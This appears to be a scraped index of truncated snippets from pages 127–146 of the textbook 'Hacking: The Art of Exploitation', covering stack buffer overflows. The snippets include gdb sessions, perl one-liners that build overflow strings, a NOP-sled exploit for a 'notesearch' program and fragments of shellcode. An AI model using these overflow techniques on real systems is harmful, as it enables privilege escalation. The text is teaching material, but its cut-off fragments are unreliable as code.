Hacking - The Art of Exploitation, 2nd Edition
Exploitation 127 11 if(strcmp(password_buffer, "brillig") == 0) 12 auth_flag = 1; 13 if(strcmp(password_buffer, "outgrabe") == 0 ...
128 0x300 As expected, the overflow cannot disturb the auth_flag variable, since it’s located before the buffer. But another exe ...
Exploitation 129 12 auth_flag = 1; 13 if(strcmp(password_buffer, "outgrabe") == 0) 14 auth_flag = 1; 15 16 return auth_flag; 17 ...
130 0x300 (gdb) c Continuing. Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at auth_over ...
Exploitation 131 0xbffff7d0: 0xb7ff47b0 0x08048510 0xbffff7e8 0x080484bb 0xbffff7e0: 0xbffff9b7 0x08048510 0xbffff848 0xb7eafeb ...
132 0x300 Notice the two lines shown in bold on page 131. At this point, the EAX register contains a pointer to the first comman ...
Exploitation 133 (gdb) cont Continuing. Breakpoint 3, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at ...
134 0x300 reader@hacking:~/booksrc $ perl -e 'print "\x41" x 20;' AAAAAAAAAAAAAAAAAAAA In addition, string concatenation can be ...
Exploitation 135 (gdb) quit reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x20. "ABCD"') [BEFORE] buffer_two ...
136 0x300 0x0804848d <main+25>: mov eax,DWORD PTR [eax] 0x0804848f <main+27>: mov DWORD PTR [esp+4],eax 0x08048493 & ...
Exploitation 137 The notesearch program is vulnerable to a buffer overflow on the line marked in bold here. int main(int argc, c ...
138 0x300 20 offset = atoi(argv[1]); (gdb) 21 22 ret = (unsigned int) &i - offset; // Set return address. 23 24 for(i=0; i & ...
Exploitation 139 (gdb) cont Continuing. Breakpoint 2, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:27 27 memcpy(buffer ...
140 0x300 called the NOP sled, that can assist with this difficult chicanery. NOP is an assembly instruction that is short for n ...
Exploitation 141 Since the notesearch exploit allows an optional command-line argument to define the offset, different offsets c ...
142 0x300 The function of the for loop should be familiar, even if the syntax is a little different. The shell variable $i itera ...
Exploitation 143 35:.mpg=01;35:.mpeg=01;35:.avi=01;35:.fli=01;35:.gl=01;35:.dl=01;35:.xcf=01;35:.xwd=01; 35:.flac=01;35:.mp3=01; ...
144 0x300 \x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89 \xe1\xcd\x80 reader@hacking:~/booksrc $ The first 10 ...
Exploitation 145 A breakpoint is set at the beginning of main(), and the program is run. This will set up memory for the program ...
146 0x300 reader@hacking:~/booksrc $ ./notesearch $(perl -e 'print "\x47\xf9\xff\xbf"x40') [DEBUG] found a 34 byte note for user ...